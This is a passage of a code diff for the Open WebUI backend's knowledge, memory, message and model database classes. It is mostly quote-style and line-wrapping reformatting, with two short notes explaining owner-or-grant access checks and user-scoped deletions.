db.query(Knowledge).order_by(Knowledge.updated_at.desc()).all() - ) + all_knowledge = db.query(Knowledge).order_by(Knowledge.updated_at.desc()).all() user_ids = list(set(knowledge.user_id for knowledge in all_knowledge)) knowledge_ids = [knowledge.id for knowledge in all_knowledge] users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) knowledge_bases = [] for knowledge in all_knowledge: @@ -216,7 +198,7 @@ def get_knowledge_bases( access_grants=grants_map.get(knowledge.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) @@ -232,36 +214,34 @@ def search_knowledge_bases( ) -> KnowledgeListResponse: try: with get_db_context(db) as db: - query = db.query(Knowledge, User).outerjoin( - User, User.id == Knowledge.user_id - ) + query = db.query(Knowledge, User).outerjoin(User, User.id == Knowledge.user_id) if filter: - query_key = filter.get("query") + query_key = filter.get('query') if query_key: query = query.filter( or_( - Knowledge.name.ilike(f"%{query_key}%"), - Knowledge.description.ilike(f"%{query_key}%"), - User.name.ilike(f"%{query_key}%"), - User.email.ilike(f"%{query_key}%"), - User.username.ilike(f"%{query_key}%"), + Knowledge.name.ilike(f'%{query_key}%'), + Knowledge.description.ilike(f'%{query_key}%'), + User.name.ilike(f'%{query_key}%'), + User.email.ilike(f'%{query_key}%'), + User.username.ilike(f'%{query_key}%'), ) ) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(Knowledge.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(Knowledge.user_id != user_id) query = AccessGrants.has_permission_filter( db=db, query=query, DocumentModel=Knowledge, filter=filter, - resource_type="knowledge", - permission="read", + resource_type='knowledge', + permission='read', ) query = query.order_by(Knowledge.updated_at.desc(), Knowledge.id.asc()) @@ -275,9 +255,7 @@ def search_knowledge_bases( items = query.all() knowledge_ids = [kb.id for kb, _ in items] - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) knowledge_bases = [] for knowledge_base, user in items: @@ -289,11 +267,7 @@ def search_knowledge_bases( access_grants=grants_map.get(knowledge_base.id, []), db=db, ).model_dump(), - "user": ( - UserModel.model_validate(user).model_dump() - if user - else None - ), + 'user': (UserModel.model_validate(user).model_dump() if user else None), } ) ) @@ -327,15 +301,15 @@ def search_knowledge_files( query=query, DocumentModel=Knowledge, filter=filter, - resource_type="knowledge", - permission="read", + resource_type='knowledge', + permission='read', ) # Apply filename search if filter: - q = filter.get("query") + q = filter.get('query') if q: - query = query.filter(File.filename.ilike(f"%{q}%")) + query = query.filter(File.filename.ilike(f'%{q}%')) # Order by file changes query = query.order_by(File.updated_at.desc(), File.id.asc()) @@ -355,69 +329,53 @@ def search_knowledge_files( items.append( FileUserResponse( **FileModel.model_validate(file).model_dump(), - user=( - UserResponse( - 
**UserModel.model_validate(user).model_dump() - ) - if user - else None - ), - collection=self._to_knowledge_model( - knowledge, db=db - ).model_dump(), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), + collection=self._to_knowledge_model(knowledge, db=db).model_dump(), ) ) return KnowledgeFileListResponse(items=items, total=total) except Exception as e: - print("search_knowledge_files error:", e) + print('search_knowledge_files error:', e) return KnowledgeFileListResponse(items=[], total=0) - def check_access_by_user_id( - self, id, user_id, permission="write", db: Optional[Session] = None - ) -> bool: + def check_access_by_user_id(self, id, user_id, permission='write', db: Optional[Session] = None) -> bool: knowledge = self.get_knowledge_by_id(id, db=db) if not knowledge: return False if knowledge.user_id == user_id: return True - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge.id, permission=permission, user_group_ids=user_group_ids, db=db, ) def get_knowledge_bases_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: Optional[Session] = None ) -> list[KnowledgeUserModel]: knowledge_bases = self.get_knowledge_bases(db=db) - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} return [ knowledge_base for knowledge_base in knowledge_bases if knowledge_base.user_id == user_id or AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge_base.id, permission=permission, user_group_ids=user_group_ids, db=db, ) ] - def get_knowledge_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[KnowledgeModel]: + def get_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> Optional[KnowledgeModel]: try: with get_db_context(db) as db: knowledge = db.query(Knowledge).filter_by(id=id).first() @@ -435,23 +393,19 @@ def get_knowledge_by_id_and_user_id( if knowledge.user_id == user_id: return knowledge - user_group_ids = { - group.id for group in Groups.get_groups_by_member_id(user_id, db=db) - } + user_group_ids = {group.id for group in Groups.get_groups_by_member_id(user_id, db=db)} if AccessGrants.has_access( user_id=user_id, - resource_type="knowledge", + resource_type='knowledge', resource_id=knowledge.id, - permission="write", + permission='write', user_group_ids=user_group_ids, db=db, ): return knowledge return None - def get_knowledges_by_file_id( - self, file_id: str, db: Optional[Session] = None - ) -> list[KnowledgeModel]: + def get_knowledges_by_file_id(self, file_id: str, db: Optional[Session] = None) -> list[KnowledgeModel]: try: with get_db_context(db) as db: knowledges = ( @@ -461,9 +415,7 @@ def get_knowledges_by_file_id( .all() ) knowledge_ids = [k.id for k in knowledges] - grants_map = AccessGrants.get_grants_by_resources( - "knowledge", knowledge_ids, db=db - ) + grants_map = AccessGrants.get_grants_by_resources('knowledge', knowledge_ids, db=db) return [ self._to_knowledge_model( knowledge, @@ -497,32 +449,26 @@ def search_files_by_id( primary_sort = File.updated_at.desc() if filter: 
- query_key = filter.get("query") + query_key = filter.get('query') if query_key: - query = query.filter(or_(File.filename.ilike(f"%{query_key}%"))) + query = query.filter(or_(File.filename.ilike(f'%{query_key}%'))) - view_option = filter.get("view_option") - if view_option == "created": + view_option = filter.get('view_option') + if view_option == 'created': query = query.filter(KnowledgeFile.user_id == user_id) - elif view_option == "shared": + elif view_option == 'shared': query = query.filter(KnowledgeFile.user_id != user_id) - order_by = filter.get("order_by") - direction = filter.get("direction") - is_asc = direction == "asc" + order_by = filter.get('order_by') + direction = filter.get('direction') + is_asc = direction == 'asc' - if order_by == "name": - primary_sort = ( - File.filename.asc() if is_asc else File.filename.desc() - ) - elif order_by == "created_at": - primary_sort = ( - File.created_at.asc() if is_asc else File.created_at.desc() - ) - elif order_by == "updated_at": - primary_sort = ( - File.updated_at.asc() if is_asc else File.updated_at.desc() - ) + if order_by == 'name': + primary_sort = File.filename.asc() if is_asc else File.filename.desc() + elif order_by == 'created_at': + primary_sort = File.created_at.asc() if is_asc else File.created_at.desc() + elif order_by == 'updated_at': + primary_sort = File.updated_at.asc() if is_asc else File.updated_at.desc() # Apply sort with secondary key for deterministic pagination query = query.order_by(primary_sort, File.id.asc()) @@ -542,13 +488,7 @@ def search_files_by_id( files.append( FileUserResponse( **FileModel.model_validate(file).model_dump(), - user=( - UserResponse( - **UserModel.model_validate(user).model_dump() - ) - if user - else None - ), + user=(UserResponse(**UserModel.model_validate(user).model_dump()) if user else None), ) ) @@ -557,9 +497,7 @@ def search_files_by_id( print(e) return KnowledgeFileListResponse(items=[], total=0) - def get_files_by_id( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[FileModel]: + def get_files_by_id(self, knowledge_id: str, db: Optional[Session] = None) -> list[FileModel]: try: with get_db_context(db) as db: files = ( @@ -572,9 +510,7 @@ def get_files_by_id( except Exception: return [] - def get_file_metadatas_by_id( - self, knowledge_id: str, db: Optional[Session] = None - ) -> list[FileMetadataResponse]: + def get_file_metadatas_by_id(self, knowledge_id: str, db: Optional[Session] = None) -> list[FileMetadataResponse]: try: with get_db_context(db) as db: files = self.get_files_by_id(knowledge_id, db=db) @@ -592,12 +528,12 @@ def add_file_to_knowledge_by_id( with get_db_context(db) as db: knowledge_file = KnowledgeFileModel( **{ - "id": str(uuid.uuid4()), - "knowledge_id": knowledge_id, - "file_id": file_id, - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + 'id': str(uuid.uuid4()), + 'knowledge_id': knowledge_id, + 'file_id': file_id, + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) @@ -613,37 +549,24 @@ def add_file_to_knowledge_by_id( except Exception: return None - def has_file( - self, knowledge_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def has_file(self, knowledge_id: str, file_id: str, db: Optional[Session] = None) -> bool: """Check whether a file belongs to a knowledge base.""" try: with get_db_context(db) as db: - return ( - db.query(KnowledgeFile) - .filter_by(knowledge_id=knowledge_id, file_id=file_id) - .first() - is not None - ) + 
return db.query(KnowledgeFile).filter_by(knowledge_id=knowledge_id, file_id=file_id).first() is not None except Exception: return False - def remove_file_from_knowledge_by_id( - self, knowledge_id: str, file_id: str, db: Optional[Session] = None - ) -> bool: + def remove_file_from_knowledge_by_id(self, knowledge_id: str, file_id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - db.query(KnowledgeFile).filter_by( - knowledge_id=knowledge_id, file_id=file_id - ).delete() + db.query(KnowledgeFile).filter_by(knowledge_id=knowledge_id, file_id=file_id).delete() db.commit() return True except Exception: return False - def reset_knowledge_by_id( - self, id: str, db: Optional[Session] = None - ) -> Optional[KnowledgeModel]: + def reset_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> Optional[KnowledgeModel]: try: with get_db_context(db) as db: # Delete all knowledge_file entries for this knowledge_id @@ -653,7 +576,7 @@ def reset_knowledge_by_id( # Update the knowledge entry's updated_at timestamp db.query(Knowledge).filter_by(id=id).update( { - "updated_at": int(time.time()), + 'updated_at': int(time.time()), } ) db.commit() @@ -675,15 +598,13 @@ def update_knowledge_by_id( knowledge = self.get_knowledge_by_id(id=id, db=db) db.query(Knowledge).filter_by(id=id).update( { - **form_data.model_dump(exclude={"access_grants"}), - "updated_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'updated_at': int(time.time()), } ) db.commit() if form_data.access_grants is not None: - AccessGrants.set_access_grants( - "knowledge", id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('knowledge', id, form_data.access_grants, db=db) return self.get_knowledge_by_id(id=id, db=db) except Exception as e: log.exception(e) @@ -697,8 +618,8 @@ def update_knowledge_data_by_id( knowledge = self.get_knowledge_by_id(id=id, db=db) db.query(Knowledge).filter_by(id=id).update( { - "data": data, - "updated_at": int(time.time()), + 'data': data, + 'updated_at': int(time.time()), } ) db.commit() @@ -710,7 +631,7 @@ def update_knowledge_data_by_id( def delete_knowledge_by_id(self, id: str, db: Optional[Session] = None) -> bool: try: with get_db_context(db) as db: - AccessGrants.revoke_all_access("knowledge", id, db=db) + AccessGrants.revoke_all_access('knowledge', id, db=db) db.query(Knowledge).filter_by(id=id).delete() db.commit() return True @@ -722,7 +643,7 @@ def delete_all_knowledge(self, db: Optional[Session] = None) -> bool: try: knowledge_ids = [row[0] for row in db.query(Knowledge.id).all()] for knowledge_id in knowledge_ids: - AccessGrants.revoke_all_access("knowledge", knowledge_id, db=db) + AccessGrants.revoke_all_access('knowledge', knowledge_id, db=db) db.query(Knowledge).delete() db.commit()
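Note: check_access_by_user_id above is the owner-or-grant pattern whose absence on the notes endpoint is exactly what this advisory describes; an authenticated user who merely knows a UUID must still fail this check. A hedged, self-contained restatement (model and table names follow the diff; the wrapper function itself is illustrative):

def can_access_knowledge(user_id: str, knowledge, permission: str = 'write') -> bool:
    if knowledge is None:
        return False  # unknown UUIDs reveal nothing
    if knowledge.user_id == user_id:
        return True   # owners always pass
    # Otherwise fall through to explicit grants, including group membership.
    user_group_ids = {g.id for g in Groups.get_groups_by_member_id(user_id)}
    return AccessGrants.has_access(
        user_id=user_id,
        resource_type='knowledge',
        resource_id=knowledge.id,
        permission=permission,
        user_group_ids=user_group_ids,
    )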
backend/open_webui/models/memories.py  +10 −18  modified

@@ -13,7 +13,7 @@
 class Memory(Base):
-    __tablename__ = "memory"
+    __tablename__ = 'memory'

     id = Column(String, primary_key=True, unique=True)
     user_id = Column(String)
@@ -49,11 +49,11 @@ def insert_new_memory(
         memory = MemoryModel(
             **{
-                "id": id,
-                "user_id": user_id,
-                "content": content,
-                "created_at": int(time.time()),
-                "updated_at": int(time.time()),
+                'id': id,
+                'user_id': user_id,
+                'content': content,
+                'created_at': int(time.time()),
+                'updated_at': int(time.time()),
             }
         )
         result = Memory(**memory.model_dump())
@@ -95,19 +95,15 @@ def get_memories(self, db: Optional[Session] = None) -> list[MemoryModel]:
         except Exception:
             return None

-    def get_memories_by_user_id(
-        self, user_id: str, db: Optional[Session] = None
-    ) -> list[MemoryModel]:
+    def get_memories_by_user_id(self, user_id: str, db: Optional[Session] = None) -> list[MemoryModel]:
         with get_db_context(db) as db:
             try:
                 memories = db.query(Memory).filter_by(user_id=user_id).all()
                 return [MemoryModel.model_validate(memory) for memory in memories]
             except Exception:
                 return None

-    def get_memory_by_id(
-        self, id: str, db: Optional[Session] = None
-    ) -> Optional[MemoryModel]:
+    def get_memory_by_id(self, id: str, db: Optional[Session] = None) -> Optional[MemoryModel]:
         with get_db_context(db) as db:
             try:
                 memory = db.get(Memory, id)
@@ -126,9 +122,7 @@ def delete_memory_by_id(self, id: str, db: Optional[Session] = None) -> bool:
         except Exception:
             return False

-    def delete_memories_by_user_id(
-        self, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_memories_by_user_id(self, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             try:
                 db.query(Memory).filter_by(user_id=user_id).delete()
@@ -138,9 +132,7 @@ def delete_memories_by_user_id(
         except Exception:
             return False

-    def delete_memory_by_id_and_user_id(
-        self, id: str, user_id: str, db: Optional[Session] = None
-    ) -> bool:
+    def delete_memory_by_id_and_user_id(self, id: str, user_id: str, db: Optional[Session] = None) -> bool:
         with get_db_context(db) as db:
             try:
                 memory = db.get(Memory, id)
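Note: delete_memory_by_id_and_user_id is truncated above, but the point of the id-and-user_id variants is visible throughout this file: every read or delete is constrained by the caller's user_id, so guessed UUIDs dead-end. A hedged sketch of that scoping (the filter_by form is an assumption, since the diff cuts off mid-method):

def delete_memory_scoped(db, id: str, user_id: str) -> bool:
    # Constrain on BOTH keys: a foreign owner's UUID matches zero rows,
    # which is indistinguishable from a nonexistent id.
    deleted = db.query(Memory).filter_by(id=id, user_id=user_id).delete()
    db.commit()
    return deleted > 0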
backend/open_webui/models/messages.py+87 −144 modified@@ -21,7 +21,7 @@ class MessageReaction(Base): - __tablename__ = "message_reaction" + __tablename__ = 'message_reaction' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) message_id = Column(Text) @@ -40,7 +40,7 @@ class MessageReactionModel(BaseModel): class Message(Base): - __tablename__ = "message" + __tablename__ = 'message' id = Column(Text, primary_key=True, unique=True) user_id = Column(Text) @@ -112,7 +112,7 @@ class MessageUserResponse(MessageModel): class MessageUserSlimResponse(MessageUserResponse): data: bool | None = None - @field_validator("data", mode="before") + @field_validator('data', mode='before') def convert_data_to_bool(cls, v): # No data or not a dict → False if not isinstance(v, dict): @@ -152,19 +152,19 @@ def insert_new_message( message = MessageModel( **{ - "id": id, - "user_id": user_id, - "channel_id": channel_id, - "reply_to_id": form_data.reply_to_id, - "parent_id": form_data.parent_id, - "is_pinned": False, - "pinned_at": None, - "pinned_by": None, - "content": form_data.content, - "data": form_data.data, - "meta": form_data.meta, - "created_at": ts, - "updated_at": ts, + 'id': id, + 'user_id': user_id, + 'channel_id': channel_id, + 'reply_to_id': form_data.reply_to_id, + 'parent_id': form_data.parent_id, + 'is_pinned': False, + 'pinned_at': None, + 'pinned_by': None, + 'content': form_data.content, + 'data': form_data.data, + 'meta': form_data.meta, + 'created_at': ts, + 'updated_at': ts, } ) result = Message(**message.model_dump()) @@ -186,9 +186,7 @@ def get_message_by_id( return None reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) @@ -200,22 +198,22 @@ def get_message_by_id( thread_replies = self.get_thread_replies_by_message_id(id, db=db) # Check if message was sent by webhook (webhook info in meta takes precedence) - webhook_info = message.meta.get("webhook") if message.meta else None - if webhook_info and webhook_info.get("id"): + webhook_info = message.meta.get('webhook') if message.meta else None + if webhook_info and webhook_info.get('id'): # Look up webhook by ID to get current name - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: # Webhook was deleted, use placeholder user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } else: user = Users.get_user_by_id(message.user_id, db=db) @@ -224,79 +222,57 @@ def get_message_by_id( return MessageResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() if reply_to_message else None - ), - "latest_reply_at": ( - thread_replies[0].created_at if thread_replies else None - ), - "reply_count": len(thread_replies), - "reactions": reactions, + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), + 'latest_reply_at': (thread_replies[0].created_at if thread_replies else None), + 'reply_count': len(thread_replies), + 'reactions': reactions, } ) 
- def get_thread_replies_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[MessageReplyToResponse]: + def get_thread_replies_by_message_id(self, id: str, db: Optional[Session] = None) -> list[MessageReplyToResponse]: with get_db_context(db) as db: - all_messages = ( - db.query(Message) - .filter_by(parent_id=id) - .order_by(Message.created_at.desc()) - .all() - ) + all_messages = db.query(Message).filter_by(parent_id=id).order_by(Message.created_at.desc()).all() messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) return messages - def get_reply_user_ids_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[str]: + def get_reply_user_ids_by_message_id(self, id: str, db: Optional[Session] = None) -> list[str]: with get_db_context(db) as db: - return [ - message.user_id - for message in db.query(Message).filter_by(parent_id=id).all() - ] + return [message.user_id for message in db.query(Message).filter_by(parent_id=id).all()] def get_messages_by_channel_id( self, @@ -318,40 +294,34 @@ def get_messages_by_channel_id( messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - 
reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) @@ -387,55 +357,42 @@ def get_messages_by_parent_id( messages = [] for message in all_messages: reply_to_message = ( - self.get_message_by_id( - message.reply_to_id, include_thread_replies=False, db=db - ) + self.get_message_by_id(message.reply_to_id, include_thread_replies=False, db=db) if message.reply_to_id else None ) - webhook_info = message.meta.get("webhook") if message.meta else None + webhook_info = message.meta.get('webhook') if message.meta else None user_info = None - if webhook_info and webhook_info.get("id"): - webhook = Channels.get_webhook_by_id(webhook_info.get("id"), db=db) + if webhook_info and webhook_info.get('id'): + webhook = Channels.get_webhook_by_id(webhook_info.get('id'), db=db) if webhook: user_info = { - "id": webhook.id, - "name": webhook.name, - "role": "webhook", + 'id': webhook.id, + 'name': webhook.name, + 'role': 'webhook', } else: user_info = { - "id": webhook_info.get("id"), - "name": "Deleted Webhook", - "role": "webhook", + 'id': webhook_info.get('id'), + 'name': 'Deleted Webhook', + 'role': 'webhook', } messages.append( MessageReplyToResponse.model_validate( { **MessageModel.model_validate(message).model_dump(), - "user": user_info, - "reply_to_message": ( - reply_to_message.model_dump() - if reply_to_message - else None - ), + 'user': user_info, + 'reply_to_message': (reply_to_message.model_dump() if reply_to_message else None), } ) ) return messages - def get_last_message_by_channel_id( - self, channel_id: str, db: Optional[Session] = None - ) -> Optional[MessageModel]: + def get_last_message_by_channel_id(self, channel_id: str, db: Optional[Session] = None) -> Optional[MessageModel]: with get_db_context(db) as db: - message = ( - db.query(Message) - .filter_by(channel_id=channel_id) - .order_by(Message.created_at.desc()) - .first() - ) + message = db.query(Message).filter_by(channel_id=channel_id).order_by(Message.created_at.desc()).first() return MessageModel.model_validate(message) if message else None def get_pinned_messages_by_channel_id( @@ -513,11 +470,7 @@ def add_reaction_to_message( ) -> Optional[MessageReactionModel]: with get_db_context(db) as db: # check for existing reaction - existing_reaction = ( - db.query(MessageReaction) - .filter_by(message_id=id, user_id=user_id, name=name) - .first() - ) + existing_reaction = db.query(MessageReaction).filter_by(message_id=id, user_id=user_id, name=name).first() if existing_reaction: return MessageReactionModel.model_validate(existing_reaction) @@ -535,9 +488,7 @@ def add_reaction_to_message( db.refresh(result) return MessageReactionModel.model_validate(result) if result else None - def get_reactions_by_message_id( - self, id: str, db: Optional[Session] = None - ) -> list[Reactions]: + def get_reactions_by_message_id(self, id: str, db: Optional[Session] = None) -> list[Reactions]: with get_db_context(db) as db: # JOIN User so all user info is fetched in one query results = ( @@ -552,28 +503,26 @@ def get_reactions_by_message_id( for reaction, user in results: if reaction.name not in reactions: reactions[reaction.name] = { - "name": reaction.name, - "users": [], - "count": 0, + 'name': reaction.name, + 'users': [], + 'count': 0, } - reactions[reaction.name]["users"].append( + reactions[reaction.name]['users'].append( { - "id": user.id, - "name": user.name, + 'id': user.id, + 'name': user.name, } ) - 
reactions[reaction.name]["count"] += 1 + reactions[reaction.name]['count'] += 1 return [Reactions(**reaction) for reaction in reactions.values()] def remove_reaction_by_id_and_user_id_and_name( self, id: str, user_id: str, name: str, db: Optional[Session] = None ) -> bool: with get_db_context(db) as db: - db.query(MessageReaction).filter_by( - message_id=id, user_id=user_id, name=name - ).delete() + db.query(MessageReaction).filter_by(message_id=id, user_id=user_id, name=name).delete() db.commit() return True @@ -612,21 +561,15 @@ def search_messages_by_channel_ids( with get_db_context(db) as db: query_builder = db.query(Message).filter( Message.channel_id.in_(channel_ids), - Message.content.ilike(f"%{query}%"), + Message.content.ilike(f'%{query}%'), ) if start_timestamp: - query_builder = query_builder.filter( - Message.created_at >= start_timestamp - ) + query_builder = query_builder.filter(Message.created_at >= start_timestamp) if end_timestamp: - query_builder = query_builder.filter( - Message.created_at <= end_timestamp - ) + query_builder = query_builder.filter(Message.created_at <= end_timestamp) - messages = ( - query_builder.order_by(Message.created_at.desc()).limit(limit).all() - ) + messages = query_builder.order_by(Message.created_at.desc()).limit(limit).all() return [MessageModel.model_validate(msg) for msg in messages]
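The reaction handling in get_reactions_by_message_id above JOINs User so every reaction row arrives with its author in a single query, then folds the rows into per-name buckets. A minimal standalone sketch of that grouping step, with plain tuples standing in for the (MessageReaction, User) ORM rows; all names and data here are illustrative:

# Group (reaction_name, user_id, user_name) rows into the shape the
# Reactions response model expects: one bucket per reaction name.
def group_reactions(rows):
    reactions = {}
    for name, user_id, user_name in rows:
        bucket = reactions.setdefault(name, {'name': name, 'users': [], 'count': 0})
        bucket['users'].append({'id': user_id, 'name': user_name})
        bucket['count'] += 1
    return list(reactions.values())

rows = [('thumbs_up', 'u1', 'Ada'), ('thumbs_up', 'u2', 'Grace'), ('eyes', 'u1', 'Ada')]
for bucket in group_reactions(rows):
    print(bucket['name'], bucket['count'], [u['name'] for u in bucket['users']])
# thumbs_up 2 ['Ada', 'Grace']
# eyes 1 ['Ada']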
backend/open_webui/models/models.py+68 −106 modified@@ -28,13 +28,13 @@ # ModelParams is a model for the data stored in the params field of the Model table class ModelParams(BaseModel): - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') pass # ModelMeta is a model for the data stored in the meta field of the Model table class ModelMeta(BaseModel): - profile_image_url: Optional[str] = "/static/favicon.png" + profile_image_url: Optional[str] = '/static/favicon.png' description: Optional[str] = None """ @@ -43,13 +43,13 @@ class ModelMeta(BaseModel): capabilities: Optional[dict] = None - model_config = ConfigDict(extra="allow") + model_config = ConfigDict(extra='allow') pass class Model(Base): - __tablename__ = "model" + __tablename__ = 'model' id = Column(Text, primary_key=True, unique=True) """ @@ -139,24 +139,18 @@ class ModelForm(BaseModel): class ModelsTable: - def _get_access_grants( - self, model_id: str, db: Optional[Session] = None - ) -> list[AccessGrantModel]: - return AccessGrants.get_grants_by_resource("model", model_id, db=db) + def _get_access_grants(self, model_id: str, db: Optional[Session] = None) -> list[AccessGrantModel]: + return AccessGrants.get_grants_by_resource('model', model_id, db=db) def _to_model_model( self, model: Model, access_grants: Optional[list[AccessGrantModel]] = None, db: Optional[Session] = None, ) -> ModelModel: - model_data = ModelModel.model_validate(model).model_dump( - exclude={"access_grants"} - ) - model_data["access_grants"] = ( - access_grants - if access_grants is not None - else self._get_access_grants(model_data["id"], db=db) + model_data = ModelModel.model_validate(model).model_dump(exclude={'access_grants'}) + model_data['access_grants'] = ( + access_grants if access_grants is not None else self._get_access_grants(model_data['id'], db=db) ) return ModelModel.model_validate(model_data) @@ -167,37 +161,32 @@ def insert_new_model( with get_db_context(db) as db: result = Model( **{ - **form_data.model_dump(exclude={"access_grants"}), - "user_id": user_id, - "created_at": int(time.time()), - "updated_at": int(time.time()), + **form_data.model_dump(exclude={'access_grants'}), + 'user_id': user_id, + 'created_at': int(time.time()), + 'updated_at': int(time.time()), } ) db.add(result) db.commit() db.refresh(result) - AccessGrants.set_access_grants( - "model", result.id, form_data.access_grants, db=db - ) + AccessGrants.set_access_grants('model', result.id, form_data.access_grants, db=db) if result: return self._to_model_model(result, db=db) else: return None except Exception as e: - log.exception(f"Failed to insert a new model: {e}") + log.exception(f'Failed to insert a new model: {e}') return None def get_all_models(self, db: Optional[Session] = None) -> list[ModelModel]: with get_db_context(db) as db: all_models = db.query(Model).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ - self._to_model_model( - model, access_grants=grants_map.get(model.id, []), db=db - ) - for model in all_models + self._to_model_model(model, access_grants=grants_map.get(model.id, []), db=db) for model in all_models ] def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: @@ -209,7 +198,7 @@ def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: users = Users.get_users_by_user_ids(user_ids, db=db) if user_ids else [] 
users_dict = {user.id: user for user in users} - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) models = [] for model in all_models: @@ -222,7 +211,7 @@ def get_models(self, db: Optional[Session] = None) -> list[ModelUserResponse]: access_grants=grants_map.get(model.id, []), db=db, ).model_dump(), - "user": user.model_dump() if user else None, + 'user': user.model_dump() if user else None, } ) ) @@ -232,42 +221,37 @@ def get_base_models(self, db: Optional[Session] = None) -> list[ModelModel]: with get_db_context(db) as db: all_models = db.query(Model).filter(Model.base_model_id == None).all() model_ids = [model.id for model in all_models] - grants_map = AccessGrants.get_grants_by_resources("model", model_ids, db=db) + grants_map = AccessGrants.get_grants_by_resources('model', model_ids, db=db) return [ - self._to_model_model( - model, access_grants=grants_map.get(model.id, []), db=db - ) - for model in all_models + self._to_model_model(model, access_grants=grants_map.get(model.id, []), db=db) for model in all_models ] def get_models_by_user_id( - self, user_id: str, permission: str = "write", db: Optional[Session] = None + self, user_id: str, permission: str = 'write', db: 